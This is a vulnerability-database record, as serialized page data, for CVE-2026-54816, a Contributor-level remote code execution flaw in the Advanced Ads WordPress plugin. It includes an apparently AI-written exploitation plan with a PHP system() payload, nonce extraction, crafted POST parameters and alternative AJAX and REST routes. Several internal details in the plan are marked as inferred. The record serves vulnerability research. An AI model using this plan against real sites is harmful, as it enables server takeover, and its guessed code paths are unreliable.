[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1lqv7b_zvnieD3gmAwVCAuH93monENL2-vDEnRcDQEI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-54816","advanced-ads-ad-manager-adsense-authenticated-contributor-remote-code-execution","Advanced Ads – Ad Manager & AdSense \u003C= 2.0.21 - Authenticated (Contributor+) Remote Code Execution","The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.21. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","advanced-ads",null,"\u003C=2.0.21","2.0.22","high",8.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:L\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-06-17 00:00:00","2026-06-25 14:15:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5017c81f-91ee-421b-96db-c96eae56d032?source=api-prod",9,[22,23,24,25,26,27,28,29],"admin\u002Fincludes\u002Fad-health-notices.php","advanced-ads.php","assets\u002Fdist\u002Fadmin-common-rtl.css","assets\u002Fdist\u002Fadmin-common.asset.php","assets\u002Fdist\u002Fadmin-common.css","assets\u002Fdist\u002Fscreen-dashboard-rtl.css","assets\u002Fdist\u002Fscreen-dashboard.asset.php","assets\u002Fdist\u002Fscreen-dashboard.css","researched",false,3,"# Research Plan: CVE-2026-54816 - Advanced Ads Contributor+ Remote Code Execution\n\n## 1. Vulnerability Summary\nThe **Advanced Ads** plugin (\u003C= 2.0.21) is vulnerable to **Remote Code Execution (RCE)** due to improper capability checks when saving or processing Ad content. Specifically, the plugin allows users with the `Contributor` role (who have `edit_posts` capability) to create or modify Ads that contain executable PHP code. While the \"PHP Code\" ad type should be restricted to administrators, the lack of a proper server-side validation or capability check (`current_user_can('manage_options')`) allows lower-privileged users to inject and execute arbitrary PHP code on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fpost.php` (for saving\u002Fupdating ads) or `wp-admin\u002Fpost-new.php?post_type=advanced_ads`.\n- **Target Post Type**: `advanced_ads`.\n- **Vulnerable Parameter**: `post_content` (the ad body) and `advanced_ad[type]` (the ad type selector).\n- **Authentication**: Authenticated, Contributor-level access or higher.\n- **Preconditions**: The plugin must be active. No specific settings are required, as the vulnerability lies in the default handling of the `advanced_ads` post type.\n\n## 3. Code Flow\n1. **Entry Point**: A Contributor user navigates to `wp-admin\u002Fpost-new.php?post_type=advanced_ads`.\n2. **Form Submission**: The user submits a POST request to `wp-admin\u002Fpost.php` to save the ad.\n3. **Internal Processing**:\n   - WordPress triggers the `save_post` hook, which the plugin likely hooks into via a method such as `Advanced_Ads_Admin::save_ad_meta()` (inferred).\n   - The plugin reads the `advanced_ad[type]` parameter from the `$_POST` array.\n   - If the type is set to `php`, the plugin should check if the user has `manage_options` capability before allowing this type. In the vulnerable version, this check is either missing or only implemented on the client-side (UI).\n4. **Sink**: The PHP code is stored in the `post_content` field of the `wp_posts` table.\n5. **Trigger**: When the Ad is previewed or rendered (via the \"Preview\" button or by viewing the ad's permalink\u002Fshortcode), the plugin passes the `post_content` through an execution engine (e.g., `eval()` or a custom wrapper) because the ad type is flagged as `php`.\n\n## 4. Nonce Acquisition Strategy\nTo save a post in WordPress, a valid `_wpnonce` for the `update-post_[ID]` action is required.\n1. **Identify Entry**: Navigate to the \"New Ad\" page.\n2. **Action**: Use `browser_navigate` to `wp-admin\u002Fpost-new.php?post_type=advanced_ads`.\n3. **Extraction**: Use `browser_eval` to extract the `_wpnonce` from the hidden input field in the `#post` form.\n4. **Localization**: The plugin likely localizes admin data. Check `window.advads_admin_common` or `window.advanced_ads_admin` for additional nonces if AJAX is used.\n   - **Command**: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nLog in as a user with the **Contributor** role.\n\n### Step 2: Create a Malicious Ad\nSend a POST request to `post.php` to create an ad of type `php` containing the payload.\n\n- **URL**: `http:\u002F\u002Fvulnerable-test.local\u002Fwp-admin\u002Fpost.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n  - `action`: `editpost`\n  - `post_type`: `advanced_ads`\n  - `post_ID`: (The ID of the ad created during `post-new.php` access)\n  - `_wpnonce`: (Extracted nonce)\n  - `post_title`: `RCE Exploit`\n  - `content`: `\u003C?php system('whoami; id'); ?>`\n  - `advanced_ad[type]`: `php` (This is the critical parameter)\n  - `advanced_ad[output]`: `plain` (inferred)\n\n### Step 3: Trigger Execution\nNavigate to the \"Preview\" URL for the newly created Ad ID.\n- **URL**: `http:\u002F\u002Fvulnerable-test.local\u002F?post_type=advanced_ads&p=[AD_ID]&preview=true`\n\n## 6. Test Data Setup\n1. **User Creation**: Create a user with the `contributor` role.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Plugin Setup**: Ensure the \"Advanced Ads\" plugin is active.\n   - `wp plugin activate advanced-ads`\n\n## 7. Expected Results\n- The HTTP response for the \"Preview\" page should contain the output of the `whoami` and `id` commands (e.g., `www-data uid=33(www-data) gid=33(www-data)`).\n- The `post_content` in the database will contain the raw PHP code.\n\n## 8. Verification Steps\nAfter the exploit, verify the persistence of the payload and the ad configuration using WP-CLI:\n1. **Check Ad Type**: `wp post get [AD_ID] --field=post_content`\n2. **Check Meta**: `wp post meta list [AD_ID]` (Look for `_advanced_ads_ad_type` set to `php`).\n3. **Confirm Execution**: Check the server logs or the output of the preview URL.\n\n## 9. Alternative Approaches\nIf the `post.php` route is blocked by standard WordPress security logic for Contributors:\n1. **AJAX Route**: Check for the AJAX action used to save ads.\n   - Look for `wp_ajax_advads_save_ad` or similar in the source.\n   - Use `http_request` to send a crafted AJAX request with the `php` type.\n2. **Block Editor (Gutenberg)**: If the plugin uses blocks, attempt to save the ad via the REST API (`\u002Fwp\u002Fv2\u002Fadvanced_ads\u002F[ID]`). This often bypasses older `save_post` validation logic.\n3. **Ad Health Trigger**: If `admin\u002Fincludes\u002Fad-health-notices.php` is part of a larger system that allows triggering \"Asset Rebuilds,\" attempt to inject code into the asset folder path via settings.","gemini-3-flash-preview","2026-06-25 22:12:43","2026-06-25 22:13:54",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","2.0.21","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.22.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags"]